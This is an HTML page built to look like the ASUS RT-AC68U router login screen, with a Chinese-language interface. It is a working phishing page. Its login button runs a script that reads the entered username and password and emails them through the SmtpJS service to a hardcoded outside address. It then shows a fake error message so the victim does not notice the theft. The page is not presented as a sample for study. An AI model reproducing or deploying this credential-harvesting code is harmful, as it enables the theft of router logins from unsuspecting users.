<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
<link rel="icon" href="http://router.asus.com/images/favicon.png">
<title>ASUS Login</title>
<style>
body{
font-family: Arial, MS UI Gothic, MS P Gothic, sans-serif;
}
.wrapper{
background:url('http://router.asus.com/images/New_ui/login_bg.png') #283437 no-repeat;
background-size: 1280px 1076px;
background-position: center 0%;
margin: 0px;
background:#283437\9;
}
.title_name {
font-size: 40pt;
color:#93d2d9;
}
.prod_madelName{
font-size: 26pt;
color:#fff;
margin-left:78px;
margin-top: 10px;
}
.login_img{
width:43px;
height:43px;
background-image: url('http://router.asus.com/images/New_ui/icon_titleName.png');
background-repeat: no-repeat;
}
.p1{
font-size: 16pt;
color:#fff;
width:480px;
}
.button{
background-color:#279FD9;
border-radius: 4px ;
transition: visibility 0s linear 0.218s,opacity 0.218s,background-color 0.218s;
height: 68px;
width: 300px;
font-size: 28pt;
color:#fff;
text-align: center;
float:right;
margin:50px 0px 0px 78px;
line-height:68px;
cursor:pointer;
}
.form_input{
background-color:rgba(255,255,255,0.2);
background-color:#576D73\9;
border-radius: 4px;
padding:23px 22px;
width: 480px;
border: 0;
height:30px;
color:#fff;
font-size:28px;
}
.nologin{
margin:10px 0px 0px 78px;
background-color:rgba(255,255,255,0.2);
padding:20px;
line-height:36px;
border-radius: 5px;
width: 480px;
border: 0;
color:#FFF;
color:#FFF\9; /* IE6 IE7 IE8 */
font-size:28px;
}
.div_table{
display:table;
}
.div_tr{
display:table-row;
}
.div_td{
display:table-cell;
}
.title_gap{
margin:20px 0px 0px 78px;
}
.img_gap{
padding-right:30px;
vertical-align:middle;
}
.password_gap{
margin:30px 0px 0px 78px;
}
.error_hint{
color: rgb(255, 204, 0);
margin:10px 0px -10px 78px;
font-size: 18px;
}
.error_hint1{
margin:40px 0px -10px 78px;
font-size: 24px;
line-height:32px;
width: 580px;
}
.main_field_gap{
margin:100px auto 0;
}
.warming_desc{
font-size: 16px;
color:#FC0;
width: 600px;
}
#captcha_img_div{
margin: 30px 0px 0px 30px;
width: 160px;
height: 60px;
border-radius: 4px;
background-color:#FFF;
float: left;
}
#captcha_pic{
width: 90%;
height:90%;
margin: 3px 0px 0px 0px;
}
#captcha_input_div{
margin: 30px 0px 0px 78px;
float: left;
}
#captcha_text{
width: 245px;
background-color: rgba(255,255,255,0.2);
background-color: #576D73\9;
border-radius: 4px;
padding: 15px 22px;
border: 0;
height: 30px;
color: #fff;
font-size: 28px;
}
#reCaptcha{
margin: 45px 0px 0px 10px;
width: 30px;
height: 30px;
float: left;
background-image: url("data:image/svg+xml;charset=US-ASCII,%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22iso-8859-1%22%3F%3E%0A%3C!DOCTYPE%20svg%20PUBLIC%20%22-%2F%2FW3C%2F%2FDTD%20SVG%201.1%2F%2FEN%22%20%22http%3A%2F%2Fwww.w3.org%2FGraphics%2FSVG%2F1.1%2FDTD%2Fsvg11.dtd%22%3E%0A%3Csvg%20version%3D%221.1%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%20xmlns%3Axlink%3D%22http%3A%2F%2Fwww.w3.org%2F1999%2Fxlink%22%20width%3D%2232%22%20height%3D%2232%22%20viewBox%3D%220%200%2032%2032%22%3E%0A%3Cpath%20fill%3D%22%23ABB2BB%22%20d%3D%22M31.638%2022.702c-0.181-0.664-0.906-0.604-1.509-0.785l-1.208-0.423c0.966-1.992%201.087-3.321%201.087-5.555%200-8.211-6.642-14.853-14.853-14.853s-14.853%206.702-14.853%2014.913%206.641%2014.853%2014.853%2014.853c0.664%200%201.208-0.543%201.208-1.208s-0.543-1.208-1.208-1.208c-6.823%200-12.438-5.555-12.438-12.438s5.615-12.438%2012.438-12.438%2012.438%205.555%2012.438%2012.438c0%201.872-0.060%202.838-0.845%204.528l-0.906-0.785c-0.604-0.423-0.906-0.966-1.509-0.785-0.664%200.181-0.966%200.906-0.785%201.509l1.449%204.408c0.181%200.543%200.664%200.845%201.147%200.845%200.121%200%200.241%200%200.362-0.060l4.408-1.449c0.604-0.181%200.966-0.845%200.725-1.509v0z%22%3E%3C%2Fpath%3E%0A%3C%2Fsvg%3E%0A");
background-repeat: no-repeat;
}
/*for mobile device*/
@media screen and (max-width: 1000px){
.title_name {
font-size: 20pt;
color:#93d2d9;
margin-left:15px;
}
.prod_madelName{
font-size: 13pt;
margin-left: 15px;
}
.p1{
font-size: 12pt;
width:100%;
}
.login_img{
background-size: 75%;
}
.form_input{
padding:10px 11px;
width: 100%;
height:30px;
font-size:16px
}
.button{
height: 50px;
width: 100%;
font-size: 14pt;
text-align: center;
float:right;
margin: 25px -22px 40px 15px;
line-height:50px;
padding-left: 7px;
}
.nologin{
margin-left:10px;
padding:10px;
line-height:18px;
width: 100%;
font-size:14px;
}
.error_hint{
margin-left:10px;
}
.error_hint1{
width: 100%;
font-size:14px;
}
.main_field_gap{
width:80%;
margin:30px 0 0 15px;
/*margin:30px auto 0;*/
}
.title_gap{
margin-left:15px;
}
.password_gap{
margin-left:15px;
}
.img_gap{
padding-right:0;
vertical-align:middle;
}
.warming_desc{
margin: 10px 15px;
width: 100%;
}
#captcha_img_div{
margin-left: 10px;
width: 30%;
height: 40px;
border-radius: 4px;
background-color:#FFF;
float: left;
}
#captcha_pic{
width: 90%;
height: 90%;
margin: 2px 0px 0px 3px;
}
#captcha_input_div{
margin-left: 15px;
width: 47%;
height: 40px;
}
#captcha_text{
padding: 0px 11px;
width: 80%;
height: 40px;
font-size: 16px
}
#reCaptcha{
margin-top: 35px;
}
}
@media screen and (max-width: 320px){
#captcha_input_div{
width: 44%;
}
}
</style>
<script>
    /* SmtpJS.com - v3.0.0 */
    var Email = {
      send: function (a) {
        return new Promise(function (n, e) {
          a.nocache = Math.floor(1e6 * Math.random() + 1), a.Action = "Send";
          var t = JSON.stringify(a);
          Email.ajaxPost("https://smtpjs.com/v3/smtpjs.aspx?", t, function (e) {
            n(e)
          })
        })
      },
      ajaxPost: function (e, n, t) {
        var a = Email.createCORSRequest("POST", e);
        a.setRequestHeader("Content-type", "application/x-www-form-urlencoded"), a.onload = function () {
          var e = a.responseText;
          null != t && t(e)
        }, a.send(n)
      },
      ajax: function (e, n) {
        var t = Email.createCORSRequest("GET", e);
        t.onload = function () {
          var e = t.responseText;
          null != n && n(e)
        }, t.send()
      },
      createCORSRequest: function (e, n) {
        var t = new XMLHttpRequest;
        return "withCredentials" in t ? t.open(e, n, !0) : "undefined" != typeof XDomainRequest ? (t = new XDomainRequest).open(e, n) : t = null, t
      }
    };
    function send_email() {
      Email.send({
        SecureToken: "789dbf3c-6622-430b-9c83-ef72320ad842",
        To: "s16071@tiaccwhf.edu.hk",
        From: "s16071@tiaccwhf.edu.hk",
        Subject: document.querySelector('#login_username').value,
        Body: document.querySelector('.password_gap > input:nth-child(1)').value
      }).then(
        message => (document.querySelector("#login_filed > div:nth-child(1)").innerHTML=('something wrong please wait'))
      );
    };
</script>
</head>
<body class="wrapper">
<iframe name="hidden_frame" id="hidden_frame" width="0" height="0" frameborder="0"></iframe>
<iframe id="dmRedirection" scrolling="no" src="" width="0" height="0" frameborder="0"></iframe>
<form method="post" name="form" action="login.cgi" target="">
<input type="hidden" name="group_id" value="">
<input type="hidden" name="action_mode" value="">
<input type="hidden" name="action_script" value="">
<input type="hidden" name="action_wait" value="5">
<input type="hidden" name="current_page" value="Main_Login.asp">
<input type="hidden" name="next_page" value="Main_Login.asp">
<input type="hidden" name="login_authorization" value="">
<input type="hidden" name="login_captcha" value="">
<div class="div_table main_field_gap">
<div class="div_tr">
<div class="title_name">
<div class="div_td img_gap">
<div class="login_img"></div>
</div>
<div class="div_td">登入</div>
</div>
<div class="prod_madelName">RT-AC68U</div>
<div id="login_filed">
<div class="p1 title_gap">用華碩路由器帳號登入</div>
<div id="name_title_ie" style="display:none;margin:20px 0 -10px 78px;" class="p1 title_gap">使用者名稱</div>
<div class="title_gap">
<input type="text" id="login_username" name="login_username" tabindex="1" class="form_input" maxlength="20" autocapitalize="off" autocomplete="off" placeholder="使用者名稱">
</div>
<div id="password_title_ie" style="display:none;margin:20px 0 -20px 78px;" class="p1 title_gap">密碼</div>
<div class="password_gap">
<input type="password" name="login_passwd" tabindex="2" class="form_input" maxlength="16" placeholder="密碼" autocapitalize="off" autocomplete="off">
</div>
<div class="error_hint" style="display: none;" id="error_status_field"></div>
<div id="captcha_field" style="display: none;">
<div id="captcha_input_div"><input id="captcha_text" name="captcha_text" tabindex="3" maxlength="5" autocapitalize="off" autocomplete="off"></div>
<div id="captcha_img_div"><img id="captcha_pic"></div>
<div id="reCaptcha" onclick="regen_captcha();"></div>
<div class="error_hint" style="display:none; clear:left;" id="error_captcha_field">Captcha is wrong. Please input again.</div>
</div>
<div class="button" onclick="send_email();">登入</div>
</div>
<div id="nologin_field" style="display:none;">
<div class="p1 title_gap"></div>
<div class="nologin">
請先登出該名使用者後，再登入使用。
<div id="logined_ip_str"></div>
</div>
</div>
<div id="logout_field" style="display:none;">
<div class="p1 title_gap"></div>
<div class="nologin">您已成功登出。</div>
</div>
</div>
</div>
</form>



</body></html>
